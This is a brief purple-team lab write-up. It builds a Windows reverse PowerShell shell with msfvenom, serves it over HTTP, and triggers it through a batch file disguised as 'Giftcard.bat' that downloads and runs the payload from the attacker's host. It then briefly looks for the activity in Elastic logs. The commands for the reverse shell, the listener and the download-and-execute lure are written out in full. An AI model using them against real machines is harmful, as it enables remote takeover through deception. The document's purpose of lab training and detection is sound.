PURPLE TEAM
Creating a reverse shell payload using Kali Linux on a Windows machine and establish remote access. Analyze the incident using Elastic, track its progression, and identify potential indicators of compromise.
First creating a payload using msfvenom.
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.5.7 lport=1337 > shell.txt
Started http server to access the payload created.
python3 -m http.server
Started Netcat to listen for the reverse shell.
nc -lvp 1337
Creating a bat file saved as Giftcard.bat on the windows machine to send a request to the kali linux(attacker) to request the payload.
@ECHO off powershell -Command "Invoke-WebRequest -URI http://10.10.5.7:8000/shell.txt -OutFile c:WindowsTempshell.bat; c:WindowsTempshell.bat"
When we click on the Giftcard.bat file, we request the payload using the http server we have established and we get the remote access on windows 10 machine
Now we have remote access to the windows machine and performed basic commands to create more traffic and actions.
We have attacked the system and now we can start the defense side by opening elastic and analyze the logs received as well as adding some filters and time we executed the file.
adding the filter to view logs with powershell actions
After viewing the first log we can see the bat file that was clicked and started.
